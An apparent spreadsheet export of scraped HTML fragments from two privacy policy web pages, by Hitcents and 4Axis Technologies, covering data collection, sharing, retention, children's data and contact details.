&lt;li&gt;Hitcents may share your information in connection with any merger, sale of our assets or a financing or acquisition of all or a portion of our business to another company. You will be notified via email and/or notice on our Sites of any change in ownership or users of your personal information.&lt;/li&gt;
&lt;li&gt;We may share aggregate or anonymous information about you with advertisers, publishers, business partners, sponsors and other third parties.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>&lt;h4&gt;Changes to the Policy&lt;/h4&gt;
&lt;p&gt;
 We may update this Policy from time to time to reflect changes to our information practices. If we make any material changes we will notify you by email (sent to the e-mail address specified in your account) or by means of a notice on this Site prior to the change becoming effective.</t>
  </si>
  <si>
    <t xml:space="preserve">We encourage you to periodically review this page for the latest information on our privacy practices.
 &lt;/p&gt;
&lt;h4&gt;Security&lt;/h4&gt;
&lt;p&gt;
Hitcents takes reasonable measures to protect your information from unauthorized access or against loss, misuse or alteration by third parties.
 &lt;/p&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t>Although we make good faith efforts to store the information collected on the Services in a secure operating environment that is not available to the public, we cannot guarantee the absolute security of that information during its transmission or its storage on our systems. Further, while we attempt to ensure the integrity and security of our network and systems, we cannot guarantee that our security measures will prevent third-party “hackers” from illegally obtaining access to this information. We do not warrant or represent that your information will be protected against, loss, misuse or alteration by third parties.</t>
  </si>
  <si>
    <t>No method of transmission over the Internet, or method of electronic storage is 100% secure. Therefore, we cannot guarantee its absolute security.
 &lt;/p&gt;
&lt;h4&gt;Access to Personal Information&lt;/h4&gt;
&lt;p&gt;
If your personal information changes, or if you no longer desire our Services, you may correct, update or delete inaccuracies by making the change within your account settings or by contacting us at appsupport@Hitcents.com.</t>
  </si>
  <si>
    <t>We will respond to your access request within 30 days.
 &lt;/p&gt;
&lt;h4&gt;Data Retention&lt;/h4&gt;
&lt;p&gt;
 We will retain your information for as long as your account is active or as needed to provide you Services.</t>
  </si>
  <si>
    <t>If you wish to cancel your account or request that we no longer use your information to provide you Services, contact us at appsupport@Hitcents.com. We will retain and use your information as necessary to comply with our legal obligations, resolve disputes and enforce our agreements.
 &lt;/p&gt;
&lt;h4&gt;Our Policy Regarding Children&lt;/h4&gt;
&lt;p&gt;
We do not knowingly collect or solicit personal information from anyone under the age of 13 or knowingly allow such persons to use our Services.</t>
  </si>
  <si>
    <t>If you are under 13, please do not send any information about yourself to us, including your name, address, telephone number or email address. No one under the age of 13 may provide any personal information. In the event that we learn that we have collected personal information from a child under age 13, we will delete that information as quickly as possible.</t>
  </si>
  <si>
    <t xml:space="preserve">If you believe that we might have any information from or about a child under the age of 13, please contact us at appsupport@Hitcents.com.
 &lt;/p&gt;
&lt;h4&gt;Opting Out of Marketing&lt;/h4&gt;
&lt;p&gt;
You may opt-out of receiving promotional emails from us by following the instructions in those emails or by emailing us at appsupport@Hitcents.com. If you opt-out, we may still send you non-promotional emails, such as emails about your accounts or our ongoing business relations.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;p&gt;
 You may also opt-out of receiving SMS notifications from us, either via SMS or by emailing us at appsupport@Hitcents.com.
 &lt;/p&gt;
&lt;h4&gt;International Transfer&lt;/h4&gt;
&lt;p&gt;
We may transfer information that we collect about you to affiliated entities, or to other third parties across borders and from your country or jurisdiction to other countries or jurisdictions around the world.</t>
  </si>
  <si>
    <t xml:space="preserve">Please note that these countries and jurisdictions may not have the same data protection laws as your own jurisdiction, and we take steps to ensure adequate safeguards are in place to enable transfer of information to the U.S. and elsewhere and the use and disclosure of information about you, including personal information, as described in this Policy.
 &lt;/p&gt;
&lt;h4&gt;Contact Information&lt;/h4&gt;
&lt;p&gt;
Hitcents.com, Inc.
&lt;br&gt;
900 Church St.
&lt;br&gt;
Bowling Green, Kentucky 42101
&lt;/p&gt;
 &lt;p&gt;
If you have any questions about this Policy, please contact us at appsupport@Hitcents.com.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
&lt;p&gt;
61530467.4
&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;footer id='footer'&gt;
&lt;div class='container-fluid style-1' id='footer-widgets'&gt;
&lt;div class='row'&gt;
&lt;div class='col-md-2'&gt;&lt;/div&gt;
&lt;div class='col-md-4 text-center'&gt;
&lt;div class='widget widget_text'&gt;
&lt;h2 class='widget-title'&gt;
&lt;span&gt;Stay up to date!&lt;/span&gt;
&lt;/h2&gt;
&lt;/div&gt;
&lt;div class='subscribe text-left'&gt;
&lt;h3&gt;Newsletter Signup&lt;/h3&gt;
&lt;!-- Begin Mailchimp Signup Form --&gt;
&lt;link href='//cdn-images.mailchimp.com/embedcode/classic-071822.css' rel='stylesheet' type='text/css'&gt;
&lt;style&gt;
  #mc_embed_signup{background:#fff; clear:left; font:14px Helvetica,Arial,sans-serif;  width:600px;}
  /* Add your own Mailchimp form style overrides in your site stylesheet or in this style block.
    </t>
  </si>
  <si>
    <t>We recommend moving this block and the preceding CSS link to the HEAD of your HTML file. */
&lt;/style&gt;
&lt;div id='mc_embed_signup' style='width: 350px;'&gt;
&lt;form action='https://hitcents.us9.list-manage.com/subscribe/post?u=290d62ed8dd689f587443c15f&amp;amp;id=5acd0e8ef4&amp;amp;f_id=00230de1f0' class='validate' id='mc-embedded-subscribe-form' method='post' name='mc-embedded-subscribe-form' novalidate='' style='margin: 0px;' target='_blank'&gt;
&lt;div id='mc_embed_signup_scroll'&gt;
&lt;div class='indicates-required'&gt;
&lt;span class='asterisk'&gt;*&lt;/span&gt;
indicates required
&lt;/div&gt;
&lt;div class='mc-field-group'&gt;
&lt;label for='mce-EMAIL'&gt;
Email Address
&lt;span class='asterisk'&gt;*&lt;/span&gt;
&lt;/label&gt;
&lt;input class='required email' id='mce-EMAIL' name='EMAIL' required='' type='email' value=''&gt;
&lt;span class='helper_text' id='mce-EMAIL-HELPERTEXT'&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;div class='mc-field-group'&gt;
&lt;label for='mce-FNAME'&gt;First Name&lt;/label&gt;
&lt;input id='mce-FNAME' name='FNAME' type='text' value=''&gt;
&lt;span class='helper_text' id='mce-FNAME-HELPERTEXT'&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;div class='mc-field-group input-group'&gt;
&lt;strong&gt; Games I want to hear more about:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;input id='mce-group[52532]-52532-0' name='group[52532][2]' type='checkbox' value='2'&gt;
&lt;label for='mce-group[52532]-52532-0'&gt;Get</t>
  </si>
  <si>
    <t>To The Orange Door&lt;/label&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;input id='mce-group[52532]-52532-1' name='group[52532][4]' type='checkbox' value='4'&gt;
&lt;label for='mce-group[52532]-52532-1'&gt;Yolked&lt;/label&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;input id='mce-group[52532]-52532-2' name='group[52532][1]' type='checkbox' value='1'&gt;
&lt;label for='mce-group[52532]-52532-2'&gt;Rendezvouz&lt;/label&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;input id='mce-group[52532]-52532-3' name='group[52532][8]' type='checkbox' value='8'&gt;
&lt;label for='mce-group[52532]-52532-3'&gt;Kokopas Atlas&lt;/label&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;input id='mce-group[52532]-52532-4' name='group[52532][16]' type='checkbox' value='16'&gt;
&lt;label for='mce-group[52532]-52532-4'&gt;Draw A Stick Man&lt;/label&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;input id='mce-group[52532]-52532-5' name='group[52532][32]' type='checkbox' value='32'&gt;
&lt;label for='mce-group[52532]-52532-5'&gt;Inspector Waffles&lt;/label&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;input id='mce-group[52532]-52532-6' name='group[52532][64]' type='checkbox' value='64'&gt;
&lt;label for='mce-group[52532]-52532-6'&gt;Forgotten Anne&lt;/label&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;input id='mce-group[52532]-52532-7' name='group[52532][128]' type='checkbox' value='128'&gt;
&lt;label for='mce-group[52532]-52532-7'&gt;Shores Unknown&lt;/label&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;input id='mce-group[52532]-52532-8' name='group[52532][256]' type='checkbox' value='256'&gt;
&lt;label for='mce-group[52532]-52532-8'&gt;Ministry of Broadcast&lt;/label&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;input id='mce-group[52532]-52532-9' name='group[52532][512]' type='checkbox' value='512'&gt;
&lt;label for='mce-group[52532]-52532-9'&gt;A Robot Named Fight&lt;/label&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;input id='mce-group[52532]-52532-10' name='group[52532][1024]' type='checkbox' value='1024'&gt;
&lt;label for='mce-group[52532]-52532-10'&gt;Aquamarine&lt;/label&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;input id='mce-group[52532]-52532-11' name='group[52532][2048]' type='checkbox' value='2048'&gt;
&lt;label for='mce-group[52532]-52532-11'&gt;Duke of Defense&lt;/label&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;span class='helper_text' id='mce-group[52532]-HELPERTEXT'&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;div class='clear' id='mce-responses'&gt;
&lt;div class='response' id='mce-error-response' style='display:none'&gt;&lt;/div&gt;
&lt;div class='response' id='mce-success-response' style='display:none'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups --&gt;
&lt;div aria-hidden='true' style='position: absolute; left: -5000px;'&gt;
&lt;input name='b_290d62ed8dd689f587443c15f_5acd0e8ef4' tabindex='-1' type='text' value=''&gt;
&lt;/div&gt;
&lt;div class='clear'&gt;
&lt;input class='button' id='mc-embedded-subscribe' name='subscribe' type='submit' value='Subscribe'&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/form&gt;
&lt;/div&gt;
&lt;script src='//s3.amazonaws.com/downloads.mailchimp.com/js/mc-validate.js' type='text/javascript'&gt;&lt;/script&gt;
&lt;script&gt;
  (function($) {window.fnames = new Array(); window.ftypes = new Array();fnames[0]='EMAIL';ftypes[0]='email';fnames[1]='FNAME';ftypes[1]='text';}(jQuery));var $mcj = jQuery.noConflict(true);
&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>End mc_embed_signup --&gt;
&lt;/div&gt;
&lt;div class='text-center'&gt;&lt;a class="btn-text show-subscribe" href="javascript:;"&gt;Subscribe to Newsletter&lt;/a&gt;&lt;/div&gt;
&lt;br&gt;
&lt;/div&gt;
&lt;div class='col-md-4 text-center'&gt;
&lt;div class='widget widget_socials'&gt;
&lt;div class='socials'&gt;
&lt;a target="_blank" rel="noreferrer" href="https://twitter.com/Hitcents"&gt;&lt;i class="fab fa-twitter"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;a target="_blank" rel="noreferrer" href="https://www.facebook.com/hitcentscom"&gt;&lt;i class="fab fa-facebook-f"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;a target="_blank" rel="noreferrer" href="https://discord.gg/hitcents"&gt;&lt;i class="fab fa-discord"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;a target="_blank" rel="noreferrer" href="https://www.tik</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!doctype html&gt;
&lt;html lang="en-US"&gt;
  &lt;head&gt;
	&lt;meta charset="utf-8"&gt;
	&lt;meta http-equiv="x-ua-compatible" content="ie=edge"&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"&gt;
	&lt;title&gt;Privacy Policy &amp;#8211; 4Axis&lt;/title&gt;
&lt;meta name='robots' content='noindex, nofollow' /&gt;
_x005F_x000D_
		&lt;!-- Meta Tag Manager --&gt;_x005F_x000D_
		&lt;meta name="apple-itunes-app" content="app-id=588358613" /&gt;_x005F_x000D_
		&lt;!-- / Meta Tag Manager --&gt;_x005F_x000D_
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link rel="stylesheet" href="https://4axis.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.3"&gt;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t>
  </si>
  <si>
    <t>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42px;}.has-black-color{color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) ! important;}.has-white-color{color: var(--wp--preset--color--white) !</t>
  </si>
  <si>
    <t>important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
&lt;/style&gt;
&lt;link rel="stylesheet" href="https://4axis.com/wp-content/plugins/bootstrap-for-contact-form-7/assets/dist/css/style.min.css?ver=6.0.3"&gt;
&lt;link rel="stylesheet" href="https://fonts.googleapis.com/ css?family=Open+Sans%3A300&amp;#038;ver=6.0.3"&gt;
&lt;link rel="stylesheet" href="https://4axis.com/wp-content/themes/4axis_v2/layout/assets/styles/free_download.css?ver=1.0.0"&gt;
&lt;link rel="stylesheet" href="https://4axis.com/wp-content/themes/4axis_v2/layout/assets/styles/vendor.css?ver=1.0.0"&gt;
&lt;link rel="stylesheet" href="https://4axis.com/wp-content/themes/4axis_v2/layout/assets/styles/main.css?ver=1.0.0"&gt;
&lt;script src="https://4axis.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0" id="jquery-core-js"&gt;&lt;/script&gt;
&lt;script src="https://4axis.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2" id="jquery-migrate-js"&gt;&lt;/script&gt;
		&lt;style type="text/css"&gt;
			div.wpcf7 .ajax-loader {
				background-image: url('https://4axis.com/wp-content/plugins/contact-form-7/images/ajax-loader.gif');
			}
		&lt;/style&gt;
			&lt;link rel="canonical" href="https://4axis.com/privacy-policy"&gt;
&lt;link rel="icon" href="https://4axis.com/wp-content/uploads/2016/12/icon-480-02-01-120x120.png" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://4axis.com/wp-content/uploads/2016/12/icon-480-02-01.png" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://4axis.com/wp-content/uploads/2016/12/icon-480-02-01.png" /&gt;
&lt;meta name="msapplication-TileImage" content="https://4axis.com/wp-content/uploads/2016/12/icon-480-02-01.png" /&gt;
		&lt;style type="text/css" id="wp-custom-css"&gt;
			/*------HeadBar Related CSS Changes---*/
#menu-item-1303 a{
	color:black;
}
#menu-item-16 a{
	color:black;
}
#menu-item-917 a{
	color:black;
}
#menu-item-917 a:hover{
	color:#7737de;
}
#menu-item-16 a:hover{
	color:#7737de;
}
#menu-item-1303 a:hover{
	color:#7737de;
}
/*----------END----------------------*/
#downloads{
	display:none;
}
/*---About</t>
  </si>
  <si>
    <t>Us Realted Changes--------*/
.form-group.section{
	padding-top:0px;
	padding-bottom:0px;
}
#about-us-heading{
	display:none;
}
#about-us-body-wrap{
	padding-top:0px;
}
/*-------------END------------------*/
/*-----Journey Related Changes-------*/
#journey-heading{
	display:none;
}
#journey-body-wrap{
	padding-top:0px;
}
/*-----------END----------------------*/
/*---Home Related CSS Changes----*/
#stats-partners{
	padding-top:0px;
	padding-bottom:24px;
}
#apple-3{
	pointer-events:none;
	cursor:default;
}
/*--------END---------------------*/
/*-------App</t>
  </si>
  <si>
    <t>Page Related CSS------*/
#apps-template{
	padding-top:0px;
}
#body-wrap-app-template{
	padding-top:36px;
}
#app-template-item-2{
	padding-top:0px
}
#apple-2{
	pointer-events:none;
	cursor:default;
}
/*------------END------------------*/
		&lt;/style&gt;
			&lt;link href="https://fonts.googleapis.com/ css?family=Dancing+Script|Lato:300,300i,400,500,700" rel="stylesheet"&gt;
	&lt;!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>WARNING: Respond.js doesn t work if you view the page via file:// --&gt;
    &lt;!--[if lt IE 9]&gt;
	&lt;script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"&gt;&lt;/script&gt;
	&lt;script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"&gt;&lt;/script&gt;
	&lt;! [endif]--&gt;
&lt;/head&gt;
  &lt;body class="page page-id-68 wp-custom-logo privacy-policy sidebar-primary"&gt;
    &lt;!--[if</t>
  </si>
  <si>
    <t>IE]&gt;
      &lt;div class="alert alert-warning"&gt;
        You are using an &lt;strong&gt;outdated&lt;/strong&gt; browser. Please &lt;a href="http://browsehappy.com/"&gt;upgrade your browser&lt;/a&gt; to improve your experience.       &lt;/div&gt;
    &lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;
    &lt;input type="checkbox" class="hidden" id="toggleMenu"&gt;
&lt;header class="header"&gt;
    &lt;div class="menu-wrap"&gt;
        &lt;div class="container"&gt;
                            &lt;a class="logo" href="https://4axis.com/"&gt;
                    &lt;img alt="Logo" src="https://4axis.com/wp-content/uploads/2016/12/logo-new-03.svg"&gt;
                &lt;/a&gt;
                        &lt;label for="toggleMenu" class="hamburger hamburger--squeeze js-hamburger"&gt;
                &lt;div class="hamburger-box"&gt;
                    &lt;div class="hamburger-inner"&gt;&lt;/div&gt;
                &lt;/div&gt;
            &lt;/label&gt;
            &lt;nav class="navigation"&gt;
                &lt;div class="menu-header-navigation-container"&gt;&lt;ul id="menu-header-navigation" class="nav nav-pills"&gt;&lt;li id="menu-item-1303" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1303"&gt;&lt;a href="https://4axis.com/apps" data-title="Products"&gt;Products&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-16" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-16"&gt;&lt;a href="https://4axis.com/journey" data-title="Journey"&gt;Journey&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-917" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-917"&gt;&lt;a href="https://4axis.com/careers" data-title="Careers"&gt;Careers&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;            &lt;/nav&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/header&gt;        &lt;!-- banner --&gt;
    &lt;div class="body-wrap"&gt;
        &lt;main class="container main single-page"&gt;
            &lt;article&gt;
    &lt;header&gt;
        &lt;h1 class="entry-title"&gt;Privacy Policy&lt;/h1&gt;
        &lt;p class="meta-datetime"&gt;Last updated: September 17, 2022&lt;/p&gt;
    &lt;/header&gt;
    &lt;div class="entry-content"&gt;
        &lt;p&gt;We, at 4Axis Technologies Pte Ltd ( We or Us ), are committed to respecting your privacy and the integrity and security of your personal data.&lt;/p&gt;
&lt;p&gt;4Axis Technologies Pte Ltd is data controller with registered office at 207A, Thomson Road,#2A – Goldhill Shopping Centre,Singapore (307640).&lt;/p&gt;
&lt;p&gt; This Privacy Policy applies to www.4axissolutions.com, all other sites or online services that are owned or operated by us, all mobile apps published by 4Axis Technologies Pte Ltd that can be used through third party platforms (collectively “Services”). This Privacy Policy explains how we collect, store, use and share your personal data and how you can exercise your privacy rights.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We may update our Privacy Policy from time to time. When we do, we will revise the date at the top of the policy. If we make changes that are material, we will use reasonable efforts to notify you (such as by placing an in-app notice or a push-notification).</t>
  </si>
  <si>
    <t>We encourage you to check this Privacy Policy regularly for updates, so that you know our current practices.&lt;/p&gt;
&lt;p&gt; By downloading, accessing and/or using our Services, you acknowledge the collection and use of your information in accordance with this Privacy Policy, including 4Axis Technologies Pte Ltd’s and our partners’ use of your data for the purposes as described below.&lt;/p&gt;
&lt;p&gt; You are not obliged to actively provide any of your personal data.</t>
  </si>
  <si>
    <t>However, some functionalities of our Services may not be accessible if you do not provide us with the respective personal data (such as contact information for customer support).&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;1. What information does the Application obtain and how is it used?&lt;/h3&gt;
&lt;h3&gt;&lt;/h3&gt;
&lt;h3&gt;1.1 User Provided Information&lt;/h3&gt;
&lt;p&gt; The Application obtains the information you provide when you download and register the Application.</t>
  </si>
  <si>
    <t>Registration with us is optional. However, please keep in mind that you may not be able to use some of the features offered by the Application unless you register with us.&lt;/p&gt;
&lt;p&gt; We may also use the information you provided us to contact you from time to time to provide you with important information, required notices and marketing promotions.&lt;/p&gt;
&lt;p&gt;1.</t>
  </si>
  <si>
    <t xml:space="preserve">Email Address&lt;br /&gt;
2. Name&lt;/p&gt;
&lt;h3&gt;1.2 Automatically Collected Information&lt;/h3&gt;
&lt;p&gt; In addition, the Application may collect certain information automatically, including, but not limited to, the type of mobile device you use, your mobile operating system, and information about the way you use the Application.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Purchases&lt;/strong&gt;&lt;br /&gt;
Purchase History&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Location&lt;/strong&gt;&lt;br /&gt;
Coarse Location&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Contact Info&lt;/strong&gt;&lt;br /&gt;
Email Address&lt;br /&gt;
 Name&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Identifiers&lt;/strong&gt;&lt;br /&gt;
User ID&lt;br /&gt;
Device ID&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Usage Data&lt;/strong&gt;&lt;br /&gt;
Product Interaction&lt;/p&gt;
&lt;h3&gt;1.3 Data we collect from our partners&lt;/h3&gt;
&lt;p&gt;In addition, the Application may collect certain information automatically, including, but not limited to, the type of mobile device you use, your mobile operating system, and information about the way you use the Application.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Third-party tools&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;p&gt;Data we may receive if you choose to link a third-party tool with the Services (such as Facebook, Google or Apple). Exactly what information we receive from such third-party tool will depend on your privacy settings, but it would typically include your basic profile information such as your user id, username, gender, picture, e-mail, your friends playing the same app. We do not get access to or store your logins or passwords for any of these third-party tools.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Third-party platforms&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In-app purchases are typically processed by the platforms (e.g. Apple App Store, Google Play, Amazon AppStore or Facebook).</t>
  </si>
  <si>
    <t>We do not collect or store your financial data, such as your credit card number or bank account. You are requested to provide payment details directly to the relevant platform. We may, however, receive limited non-financial data relating to the purchase (e.g. platforms may notify us if a purchase was successful).</t>
  </si>
  <si>
    <t>Any post-purchase processes are controlled by the platforms. We encourage you to review privacy policies and terms of service of the platforms for further information before making a purchase in the Services.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Advertising partners&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;From time to time, we may receive non-personal information from our advertising partners concerning the performance of our advertising campaigns (ex: we may be provided with information from which ad network and advertising campaign the install of our Service originated from or data necessary to fight fraud (such as refund abuse in apps or click fraud in advertising).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Third-party service providers&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; Our analytics providers may provide us with information regarding your use of our Services (such as in-app events, your interaction with the Services and in-app advertisements, software errors, etc.)</t>
  </si>
  <si>
    <t>so that we could improve our Services.&lt;/p&gt;
&lt; h3&gt;1.4 How your data is stored when using FacePaint in iOS?&lt;/h3&gt;
&lt;p&gt;When using FacePaint, the Application will request access your front facing camera using the TrueDepth API. We do not collect or store your TrueDepth data at any time.&lt;/p&gt;
&lt;h3&gt;2.</t>
  </si>
  <si>
    <t>Does the Application collect precise real time location information of the device?&lt;/h3&gt;
&lt;p&gt; This Application does not collect precise information about the location of your mobile device.&lt;/p&gt;
&lt;h3&gt;3. Do third parties see and/or have access to information obtained by the Application?&lt;/h3&gt;
&lt;p&gt;Only aggregated, anonymised data is periodically transmitted to external services to help us improve the Application and our service.</t>
  </si>
  <si>
    <t>We will share your information with third parties only in the ways that are described in this privacy statement.&lt;/p&gt;
&lt;p&gt; We may disclose User Provided and Automatically Collected Information as follows:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Third-Party Advertising&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Purchases&lt;/em&gt;&lt;br /&gt;
 Purchase History&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Identifiers&lt;/em&gt;&lt;br /&gt;
User ID&lt;br /&gt;
Device ID&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Usage Data&lt;/em&gt;&lt;br /&gt;
Product Interaction&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Location&lt;/em&gt;&lt;br /&gt;
Coarse Location&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Usage Data&lt;/em&gt;&lt;br /&gt;
Product Interaction&lt;/p&gt;
&lt;p&gt;as required by law, such as to comply with a subpoena, or similar legal process;&lt;/p&gt;
&lt;p&gt;when we believe in good faith that disclosure is necessary to protect our rights, protect your safety or the safety of others, investigate fraud, or respond to a government request;&lt;/p&gt;
&lt;p&gt;with our trusted services providers who work on our behalf, do not have an independent use of the information we disclose to them, and have agreed to adhere to the rules set forth in this privacy statement.&lt;/p&gt;
&lt;p&gt;if 4Axis Technologies Pte Ltd is involved in a merger, acquisition, or sale of all or a portion of its assets, you will be notified via email and/or a prominent notice on our Web site of any change in ownership or uses of this information, as well as any choices you may have regarding this information.&lt;/p&gt;
&lt;h3&gt;4.</t>
  </si>
  <si>
    <t>What are my opt-out rights?&lt;/h3&gt;
&lt;p&gt;You can stop all collection of information by the Application easily by uninstalling the Application. You may use the standard uninstall processes as may be available as part of your mobile device or via the mobile application marketplace or network.&lt;/p&gt;
&lt;p&gt;You can contact us via email , info@3.80.29.245 to request to opt-out of the services.&lt;/p&gt;
&lt;h3&gt;5. Data Retention Policy, Managing Your Information&lt;/h3&gt;
&lt;p&gt;We will retain User Provided data for as long as you use the Application and for a reasonable time thereafter.</t>
  </si>
  <si>
    <t>Please note that some or all of the User Provided Data may be required in order for the Application to function properly.&lt;/p&gt;
&lt;h3&gt;5.1 Right to Delete&lt;/h3&gt;
&lt;p&gt;You have the right to request that we delete any of your personal information we collected and retained, subject to certain exceptions. Once we receive and verify your consumer request, we will delete your personal information from our records. You can contact us via email , info@3.80.29.245 to request of deletion data.&lt;/p&gt;
&lt;h3&gt;6.</t>
  </si>
  <si>
    <t>Children&lt;/h3&gt;
&lt;p&gt;We do not use the Application to knowingly solicit data from or market to children under the age of 13. If a parent or guardian becomes aware that his or her child has provided us with information without their consent, he or she should contact us at info@3.80.29.245 . We will delete such information from our files within a reasonable time.&lt;/p&gt;
&lt;h3&gt;7.</t>
  </si>
  <si>
    <t>Security&lt;/h3&gt;
&lt;p&gt; We are concerned about safeguarding the confidentiality of your information. We provide physical, electronic, and procedural safeguards to protect information we process and maintain.</t>
  </si>
  <si>
    <t>For example, we limit access to this information to authorized employees and contractors who need to know that information in order to operate, develop or improve our Application. Please be aware that, although we endeavor provide reasonable security for information we process and maintain, no security system can prevent all potential security breaches.&lt;/p&gt;
&lt;h3&gt;8. Changes&lt;/h3&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>This Privacy Policy may be updated from time to time for any reason. We will notify you of any changes to our Privacy Policy by posting the new Privacy Policy here. You are advised to consult this Privacy Policy regularly for any changes, as continued use is deemed approval of all changes.&lt;/p&gt;
&lt;h3&gt;9.</t>
  </si>
  <si>
    <t>Your Consent&lt;/h3&gt;
&lt;p&gt;By using the Application, you are consenting to our processing of your information as set forth in this Privacy Policy now and as amended by us. “Processing,” means using cookies on a computer/hand held device or using or touching information in any way, including, but not limited to, collecting, storing, deleting, using, combining and disclosing information, all of which activities will take place in the Sri Lanka. If you reside outside the Sri Lanka your information will be transferred, processed and stored there under Sri Lanka privacy standards.&lt;/p&gt;
&lt;h3&gt;10.</t>
  </si>
  <si>
    <t>Contact us&lt;/h3&gt;
&lt;p&gt;If you have any questions regarding privacy while using the Application, or have questions about our practices, please contact us via email at info@4axissolutions.com&lt;/p&gt;
&lt;h3&gt;&lt;/h3&gt;
            &lt;/div&gt;
&lt;/article&gt;
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
        &lt;/main&gt;
    &lt;/div&gt;
    &lt;!--footer--&gt;
&lt;div class="footer" data-aos="fade-in" data-aos-delay="0"&gt;
    &lt;div class="container"&gt;
	    &lt;ul id="menu-footer-menu" class="list-inline text-center footer-menu nav-footer-hover-bold"&gt;&lt;li id="menu-item-1302" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1302"&gt;&lt;a href="https://4axis.com/apps" data-title="Products"&gt;Products&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-76" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-76"&gt;&lt;a href="https://4axis.com/journey" data-title="Journey"&gt;Journey&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-916" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-916"&gt;&lt;a href="https://4axis.com/careers" data-title="Careers"&gt;Careers&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-296" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-296"&gt;&lt;a href="https://4axis.com/terms-of-use" data-title="Terms"&gt;Terms&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-295" class="menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-68 current_page_item menu-item-295"&gt;&lt;a href="https://4axis.com/privacy-policy" aria-current="page" data-title="Privacy Policy"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1265" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1265"&gt;&lt;a href="https://4axis.com/category/blog" data-title="Blog"&gt;Blog&lt;/a&gt;&lt;/li&gt;
